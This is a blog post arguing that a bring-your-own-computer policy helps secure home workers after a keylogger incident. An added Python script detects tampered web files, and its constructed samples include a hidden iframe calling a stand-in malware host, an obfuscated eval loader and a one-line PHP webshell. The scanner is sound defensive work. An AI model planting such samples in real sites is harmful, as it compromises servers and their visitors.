A couple of months ago, I wrote about allowing employees to bring their own computer to work instead of using company-provided hardware, and part of that article was featured on I-CIO.
Recently, I had an interesting chat with a fellow manager about security, which led me to the conclusion that a proper BYOC policy can actually be an important part of a company’s overall security management.
The company’s global work policy includes a “work from home” arrangement that allows employees to work part of the week from home, provided they agree to play by the rules, which are properly documented and must be accepted in writing by the employee before they apply. I think that being able to work from home is something every company should make possible for its employees nowadays, especially IT firms. Fast, cheap and reliable broadband connections are available in most EU countries, VPN access is a standard part of most companies’ IT infrastructure, and from an ecological point of view it makes more sense than ever to save some fuel and CO2 emissions by not driving to the workplace every day. That is without even mentioning the boost in motivation, as people can combine their professional and personal lives more easily.
So, one day, one of the employees who regularly works from home had the very bad luck of getting his home PC infected by some kind of keylogger. It silently transmitted his FTP credentials to some obscure servers in China, which in turn used those credentials to inject code into script files on a web server; the tampered scripts were in their turn aimed at infecting even more PCs belonging to the website’s visitors, installing the keylogger through a combination of cross-site scripting and a browser vulnerability exploit. Very bad for the employee, and for the company. The issue was quickly identified and cured, thankfully.
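The second half of that chain, the web server files modified with stolen FTP credentials, is the part the company can put a check on. As an added example (not something from the original post, and not the tooling the company actually used), here is a Python script that does what a webmaster wants after a credential theft of this kind: hash every file in the web root against a manifest taken at deploy time, then flag the usual shapes of a drive-by injection, namely script or iframe references to hosts outside the site’s own allowlist, zero-size or hidden iframes, and eval() wrapped around unescape()/atob()/String.fromCharCode() payloads. The hostnames, file paths and file contents below are constructed for the example, and the allowlist is an assumption about which hosts the site legitimately loads from.

```python
"""Added example: detect script/iframe injected into web files with stolen FTP credentials.

Two checks: (1) integrity, hash each file and compare with a manifest recorded at
deploy time; (2) content, look for script/iframe references to hosts outside the
site's allowlist, hidden iframes and obfuscated eval() payloads, the usual shape
of a drive-by injection. Hosts, paths and file contents are constructed.
"""
from __future__ import annotations

import hashlib
import re
from urllib.parse import urlparse

# Assumption: the hosts this site legitimately loads script/iframe content from.
ALLOWED_HOSTS = {"www.example-corp.test", "cdn.example-corp.test"}

# <script src=...> or <iframe src=...> pointing at an absolute http(s) URL.
SRC_REF = re.compile(
    r'<(?P<tag>script|iframe)\b[^>]*?\bsrc\s*=\s*["\']?(?P<url>https?://[^"\'\s>]+)', re.I)
# Iframes sized to zero or hidden via CSS: nothing a legitimate page needs.
HIDDEN_IFRAME = re.compile(
    r'<iframe\b[^>]*(?:\bwidth\s*=\s*["\']?0\b|\bheight\s*=\s*["\']?0\b'
    r'|visibility\s*:\s*hidden|display\s*:\s*none)', re.I)
# eval() fed by a decoder: classic obfuscated loader appended to a .js file.
OBFUSCATED_EVAL = re.compile(
    r'\beval\s*\(\s*(?:unescape|atob|String\.fromCharCode)\s*\(', re.I)


def sha256(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def build_manifest(files: dict[str, str]) -> dict[str, str]:
    """Hash manifest of a known-good tree; take it at deploy time, store it off the web server."""
    return {path: sha256(body) for path, body in files.items()}


def scan_content(body: str, allowed_hosts: set[str]) -> list[str]:
    """Return human-readable findings for one file's content."""
    findings = []
    for m in SRC_REF.finditer(body):
        host = (urlparse(m.group("url")).hostname or "").lower()
        if host not in allowed_hosts:
            findings.append(f"external {m.group('tag').lower()} src -> {host}")
    if HIDDEN_IFRAME.search(body):
        findings.append("hidden iframe")
    if OBFUSCATED_EVAL.search(body):
        findings.append("obfuscated eval() payload")
    return findings


def scan_site(files: dict[str, str], manifest: dict[str, str],
              allowed_hosts: set[str] = ALLOWED_HOSTS) -> dict[str, list[str]]:
    """Compare the live tree against the manifest and content-scan every file.

    Returns {path: [findings]}; only paths with at least one finding appear.
    A file that merely changed is reported as well: a webshell or a one-line
    injected include may not match any of the content patterns.
    """
    report: dict[str, list[str]] = {}
    for path, body in files.items():
        findings = []
        expected = manifest.get(path)
        if expected is None:
            findings.append("file not in manifest (new)")
        elif expected != sha256(body):
            findings.append("hash differs from manifest (modified)")
        findings += scan_content(body, allowed_hosts)
        if findings:
            report[path] = findings
    for path in manifest.keys() - files.keys():
        report[path] = ["file missing from live tree"]
    return report


# Constructed sample: a clean tree at deploy time, then the same tree after tampering.
CLEAN_TREE = {
    "index.php": '<html><head><script src="http://cdn.example-corp.test/app.js"></script>'
                 '</head><body>hi</body></html>',
    "inc/footer.php": '<div id="footer">&copy; Example Corp</div>',
    "js/main.js": 'function init(){ document.title = "Example"; }',
}
MANIFEST = build_manifest(CLEAN_TREE)

LIVE_TREE = dict(CLEAN_TREE)
LIVE_TREE["inc/footer.php"] += ('<iframe src="http://malware.example.invalid/in.php" '
                                'width="0" height="0" style="visibility:hidden"></iframe>')
LIVE_TREE["js/main.js"] += '\neval(unescape("%66%75%6e%63%74%69%6f%6e"));'
LIVE_TREE["tmp/x.php"] = "<?php @eval($_POST['c']); ?>"


def demo() -> dict[str, list[str]]:
    return scan_site(LIVE_TREE, MANIFEST)


if __name__ == "__main__":
    for path, findings in demo().items():
        print(f"{path}: " + "; ".join(findings))
```

The manifest has to live somewhere the stolen FTP account cannot write, otherwise the attacker simply updates it along with the files; and the scan has to run from a host other than the one the credentials give access to. The pattern checks are a second line only: the hash comparison is what catches the small, unobtrusive edit, which is why a changed file is reported even when no pattern matches.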
Talking about the BYOC idea with the employee’s manager, he told me: “Well look, that’s what happens with strange ideas like yours about ‘bring your own computer to work’ and so on …”. I could only disagree, respectfully but firmly. First of all, this wasn’t a case of bring your own computer to work at all: the employee was using his own hardware at home, not at the office. It was rather a problem with the company’s IT security concept. On the contrary, had the company applied a proper BYOC policy, the employee’s computer would have been fully integrated into the company’s security process and would, for instance, have been equipped with proper, up-to-date antivirus software.
My conclusion is that “work from home” actually works best when combined with “bring your own computer to work”, because it allows the security processes to be applied not only to the computers inside the company, but also to the hardware used outside the company for company purposes. One approach would be to require employees who want to work from home to also bring that hardware to their office workplace (this works a bit less well with desktop computers, I have to admit). This allows the company’s IT security processes to be applied, security and reporting software to be installed, and a proactive security aura to shine well beyond the office walls. For the employee, this comes at the cost of opening up their personal gear to the eyes of the company IT security team, of course. Then again, nobody is forced to work from home. If you want to take advantage of working from your comfy home, you have to give something in return.
Of course, at the end of the day, none of this works if your employees don’t have the right mindset, or if you haven’t educated them responsibly. The most complete and secure policies are useless if their overall impact is not understood, or if they are not easy to apply on a daily basis.
What do you think? Please share your views, I promise I’ll reply to every comment.